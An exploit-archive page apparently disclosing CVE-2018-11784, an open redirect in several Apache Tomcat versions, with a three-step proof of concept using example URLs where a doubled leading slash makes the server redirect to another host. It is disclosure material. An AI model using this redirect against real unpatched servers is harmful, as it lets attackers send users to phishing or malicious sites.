Apache Tomcat 9.0.0M1 Open Redirect

Apache Tomcat 9.0.0M1 Open Redirect: Posted Jul 11, 2021; Authored by Central Infosec; These are details on an open redirection vulnerability in Apache Tomcat version 9.0.0M1 that was discovered in 2018.; tags | exploit; advisories | CVE-2018-11784; SHA-256 | e374b72f534a0d9e0f9dad4d4370a5f0b3b70a15b8a074782e0503384eb02aab; Download | Favorite | View

Apache Tomcat 9.0.0M1 Open Redirect

# Exploit Title: Apache Tomcat 9.0.0.M1 - Open Redirect
# Date: 10/04/2018
# Exploit Author: Central InfoSec
# Version: Apache Tomcat 9.0.0.M1 to 9.0.0.11, 8.5.0 to 8.5.33, and 7.0.23 to 7.0.90
# CVE : CVE-2018-11784

# Proof of Concept:

# Identify a subfolder within your application
https://example.com/test/

# Modify the URL to include at least 2 leading slashes before the subfolder and no trailing slash
https://example.com//test

# Browse to the newly created URL and the application will perform a redirection
https://test/

Top Authors In Last 30 Days

Red Hat 235 files
Ubuntu 50 files
Debian 19 files
LiquidWorm 15 files
Apple 9 files
Gentoo 5 files
Google Security Research 3 files
Alter Prime 3 files
Pierre Kim 2 files
Jann Horn 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,945)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,337)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,987)
UNIX (9,475)
UnixWare (188)
Windows (6,784)
Other

Apache Tomcat 9.0.0M1 Open Redirect

Apache Tomcat 9.0.0M1 Open Redirect

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Apache Tomcat 9.0.0M1 Open Redirect

Share This

Apache Tomcat 9.0.0M1 Open Redirect

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems